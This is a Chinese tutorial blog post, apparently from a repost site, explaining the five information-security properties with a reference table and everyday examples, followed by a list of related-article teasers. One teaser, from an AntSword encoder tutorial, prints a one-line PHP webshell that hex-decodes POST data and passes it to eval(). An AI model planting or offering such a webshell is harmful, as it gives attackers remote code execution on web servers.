【密码学】信息安全五大属性

news2024/10/6 7:19:58

        信息安全的五大属性,通常被称为CIA三元组加上两个额外的属性,他们是确保信息在存储、处理和传输过程中保持安全、完整和可用的关键要素。这些属性共同构成了信息安全的基础框架。

一、信息安全五大属性

        我先给出一个直观的列表,方面大家后续快速查阅,然后再对每一个属性进行说明。 

信息安全属性描述实现手段
机密性确保信息仅被授权的个体或系统访问。加密技术、访问控制列表(ACLs)、防火墙等
完整性保证信息在传输和存储过程中不被未经授权的修改。散列函数、数字签名、安全协议如SSL/TLS
认证性确认用户或系统的身份,确保与之交互的是预期的实体。用户名/密码、双因素认证、生物识别技术等
不可否认性确保发送者不能否认其发送的信息,接收者也不能否认其接收的信息。数字签名、时间戳服务
可用性保证授权用户能够随时访问所需的信息和资源。高可用性设计、灾难恢复计划、冗余系统和备份策略

(1)机密性(Confidentiality)

确保信息仅被授权的个体或系统访问。

例子:在一个医疗保健系统中,患者的病历信息被加密存储,只有授权的医生和护士才能解密查看。例如,使用AES(高级加密标准)加密算法,确保即使数据在传输或存储过程中被截获,也无法解读其内容。

(2)完整性(Integrity)

保证信息在传输和存储过程中不被未经授权的修改。

例子:在银行交易中,使用数字签名和哈希函数来确保转账记录未被篡改。例如,每当一笔交易发生,银行会计算交易数据的哈希值并附加数字签名。在接收端,银行会重新计算哈希值并与签名中的哈希值比较,以确认数据没有被修改。

(3)认证性(Authentication)

确认用户或系统的身份,确保与之交互的是预期的实体。

例子:网上银行登录时,用户不仅需要输入用户名和密码,还需要通过手机接收的一次性验证码进行二次认证。这种双因素认证(2FA)增加了安全性,确保只有合法用户能够访问账户。

(4)不可否认性(Non-repudiation)

确保发送者不能否认其发送的信息,接收者也不能否认其接收的信息。

例子:在电子商务中,当消费者购买商品并在线支付后,商家和消费者都会收到带有数字签名的交易确认。这样,任何一方都不能否认交易的发生,因为数字签名提供了交易的法律效力和证据。

(5)可用性(Availability)

保证授权用户能够随时访问所需的信息和资源。

例子:云服务提供商为了保证客户的数据始终可用,会在多个数据中心部署冗余服务器和存储设备。例如,当一个数据中心因自然灾害或硬件故障而失效时,另一个数据中心可以立即接管服务,确保用户可以继续访问他们的数据和应用程序。

二、信息安全五大属性的体现举例说明 

        以下是一个简化的例子,通过甲乙双方之间的通信过程来说明信息安全的五大属性。

 场景设定

  • 甲方:信息发送者,需要向乙方发送一份机密合同。
  • 乙方:信息接收者,需要确认合同内容并签署。

(1)机密性(Confidentiality)

        甲方在发送合同之前,使用加密软件对合同文件进行加密,确保只有拥有解密密钥的乙方能够阅读合同内容。这样,即使合同在传输过程中被截获,也无法被未经授权的第三方解密阅读。

(2)完整性(Integrity)

        甲方在加密合同文件后,还计算了文件的哈希值(一种独特的数字指纹),并将哈希值一同发送给乙方。乙方收到文件后,使用相同的哈希算法重新计算文件的哈希值,并与甲方提供的哈希值进行比较。如果两者一致,说明合同文件在传输过程中未被篡改。

(3)认证性(Authentication)

        甲乙双方使用数字证书进行身份认证。甲方在发送加密合同和哈希值时,会附加自己的数字签名。乙方使用甲方的公钥验证数字签名的有效性,从而确认合同确实来自甲方且未被篡改。同时,乙方也可以向甲方发送带有自己数字签名的确认信息,以证明自己的身份。

(4)不可否认性(Non-repudiation)

        由于合同文件和哈希值都附有数字签名,因此甲方无法否认自己发送过该合同文件(因为其他人无法伪造有效的数字签名)。同样,如果乙方确认接收并同意合同内容,其发送的确认信息也带有数字签名,因此乙方也无法否认自己接收并同意了合同。

(5)可用性(Availability)

        假设在合同传输过程中,网络出现了短暂的故障或拥塞。然而,由于甲方和乙方都采用了可靠的通信协议和错误恢复机制(如重传机制),合同文件最终成功传输给了乙方。这确保了乙方在需要时能够访问和使用合同文件,体现了信息的可用性。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1905119.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++面向对象的常见面试题目(一)

1. 面向对象的三大特征 &#xff08;1&#xff09;封装&#xff1a;隐藏对象的内部状态&#xff0c;只暴露必要的接口。 #include <iostream> #include <string>// 定义一个简单的类 Person class Person { private: // 私有成员&#xff0c;外部不可直接访问std…

【LeetCode】十三、分治法:多数元素 + 最大子序列和

文章目录 1、分治法2、leetcode169&#xff1a;多数元素3、leetcode53&#xff1a;最大子序和 1、分治法 分治一般都搭配递归使用&#xff1a; 用分治法的一个应用——归并排序&#xff1a;将一组数不停的一分为二&#xff0c;直到分到每组只有一个数的时候 分到每组只有一个数…

【qt】TCP 服务端怎么收到信息?

上一节,我已经讲了,TCP的监听,是基于上一节的,不知道的可以看看. 当我们的TCP 服务器 有 客户端请求连接的时候,会发出一个信号newConnection(). 在TCP服务端与客户端的通信中,我们需要使用到套接字 QTcpSocket类. 套接字相当于是网络通信的接口,服务段和客户端都要通过它进行通…

【网络安全】实验一(网络拓扑环境的搭建)

一、本次实验的实验目的 学习利用 VMware 创建虚拟环境 学习利用 VMware 搭建各自网络拓扑环境 二、创建虚拟机 三、克隆虚拟机 选择克隆的系统必须处于关机状态。 方法一&#xff1a; 方法二&#xff1a; 需要修改克隆计算机的名字&#xff0c;避免产生冲突。 四、按照要求完…

JavaWeb—js(1)

概述 javascript简称js 1.js的特点&#xff0c;基本语法&#xff0c;对象等 2.js的功能&#xff0c;用来操作页面元素&#xff0c;用户交互&#xff0c;浏览器交互&#xff0c;网络数据的请求 后期使用的更多的是js的框架 jquery.js vue.js react.js JS相关概念 javascrip…

python使用pywebview集成vue3和element-plus开发桌面系统框架

随着web技术越来越成熟&#xff0c;就连QQ的windows客户端都用web技术来开发&#xff0c;所以在未来&#xff0c;web技术来开发windows桌面软件也会越来越多&#xff0c;所以在此发展驱动之下&#xff0c;将最近流程的python与web技术相结合&#xff0c;使用vue3和element-plus…

蚁剑编码器编写——中篇

看第二个示例 hex编码 木马 <?php foreach($_POST as $k > $v){$_POST[$k]pack("H*", $v);} eval($_POST[ant]); ?>pack(“H*”, $v)是将 $v 转换为为二进制&#xff0c;也就是ASCII解码 编码器 module.exports (pwd, data) > {let ret {};for (…

C/C++ 代码注释规范及 doxygen 工具

参考 谷歌项目风格指南——注释 C doxygen 风格注释示例 ubuntu20 中 doxygen 文档生成 doxygen 官方文档 在 /Doxygen/Special Command/ 章节介绍 doxygen 的关键字 注释说明 注释的目的是提高代码的可读性与可维护性。 C 风格注释 // 单行注释/* 多行注释 */ C 风格注…

ESP32 步进电机精准控制:打造高精度 DIY 写字机器人,实现流畅书写体验

摘要: 想让你的 ESP32 不再仅仅是控制灯光的工具吗&#xff1f; 本文将带你使用 ESP32 开发板、步进电机和简单的机械结构打造一个能够自动写字的机器人。我们将深入浅出地讲解硬件连接、软件代码以及控制逻辑&#xff0c;并提供完整的项目代码和电路图&#xff0c;即使是 Ardu…

AI与编程:一个学生的心路历程与思考

前言 大家好&#xff0c;本人是在一个在校的大学生&#xff0c;方向是前端语言。爱好是码代码和看一点小新闻&#xff0c;游戏也是喜爱的。其实本篇文章的想法是源于网上一些人对AI以及对前端的看法&#xff0c;看完网上的评论后我也是有感而发。本篇文章的讨论中心也是围绕着A…

我国网络安全领域有哪些法律法规?主要内容是什么?

1. 背景介绍 网络信息安全方面的法规在全球范围内都有相应的立法&#xff0c;我们主要的立法有《网络安全法》、《密码法》、《数据安全法》以及《个人信息保护法》。当前也有一些相关的条例和管理办法&#xff0c;接下来就为大家一一介绍。 2. 法规介绍 在中国&#xff0c;…

昇思25天学习打卡营第14天|基于MindNLP的文本解码原理

基于MindNLP的文本解码原理 文本解码 文本解码是自然语言处理中的一个关键步骤,特别是在任务如机器翻译、文本摘要、自动回复生成等领域。解码过程涉及将编码器(如语言模型、翻译模型等)的输出转换为可读的文本序列。以下是一些常见的文本解码方法和原理: 1. 自回归解码:…

2.3.2 主程序和外部IO交互 (文件映射方式)----C#调用范例

2.3.2 主程序和外部IO交互 &#xff08;文件映射方式&#xff09;----C#调用范例 效果显示 1 说明 1 .1 Test_IOServer是64bit 程序&#xff0c; BD_SharedIOServerd.dll 在 /Debug文件夹中 1 .2 Test_IOServer是32bit 程序&#xff0c; BD_SharedIOClientd.dll (32bit&#…

安卓的组件

人不走空 &#x1f308;个人主页&#xff1a;人不走空 &#x1f496;系列专栏&#xff1a;算法专题 ⏰诗词歌赋&#xff1a;斯是陋室&#xff0c;惟吾德馨 目录 &#x1f308;个人主页&#xff1a;人不走空 &#x1f496;系列专栏&#xff1a;算法专题 ⏰诗词歌…

六、数据可视化—flask框架入门(爬虫及数据可视化)

六、数据可视化—flask框架入门&#xff08;爬虫及数据可视化&#xff09; 1&#xff0c;数据可视化简介2&#xff0c;flask&#xff08;1&#xff09;创建flask项目&#xff08;2&#xff09;开启debug模式&#xff08;3&#xff09;通过访问路径传递参数&#xff08;4&#x…

【鸿蒙学习笔记】页面布局

官方文档&#xff1a;布局概述 常见页面结构图 布局元素的组成 线性布局&#xff08;Row、Column&#xff09; 了解思路即可&#xff0c;更多样例去看官方文档 Entry Component struct PracExample {build() {Column() {Column({ space: 20 }) {Text(space: 20).fontSize(15)…

C语言 指针和数组——指针和二维数组之间的关系

目录 换个角度看二维数组 指向二维数组的行指针 按行指针访问二维数组元素 再换一个角度看二维数组 按列指针访问二维数组元素 二维数组作函数参数 指向二维数组的行指针作函数参数 指向二维数组的列指针作函数参数​编辑 用const保护你传给函数的数据 小结 换个角度看…

Mysql explain语句详解与实例展示

首先简单介绍sql&#xff1a; SQL语言共分为四大类&#xff1a;数据查询语言DQL&#xff0c;数据操纵语言DML&#xff0c;数据定义语言DDL&#xff0c;数据控制语言DCL。 1. 数据查询语言DQL 数据查询语言DQL基本结构是由SELECT子句&#xff0c;FROM子句&#xff0c;WHERE子句…

Kafka(一)基础介绍

一&#xff0c;Kafka集群 一个典型的 Kafka 体系架构包括若Producer、Broker、Consumer&#xff0c;以及一个ZooKeeper集群&#xff0c;如图所示。 ZooKeeper&#xff1a;Kafka负责集群元数据的管理、控制器的选举等操作的&#xff1b; Producer&#xff1a;将消息发送到Broker…

k8s学习之cobra命令库学习

1.前言 打开k8s代码的时候&#xff0c;我发现基本上那几个核心服务都是使用cobra库作为命令行处理的能力。因此&#xff0c;为了对代码之后的代码学习的有比较深入的理解&#xff0c;因此先基于这个库写个demo&#xff0c;加深对这个库的一些理解吧 2.cobra库的基本简介 Git…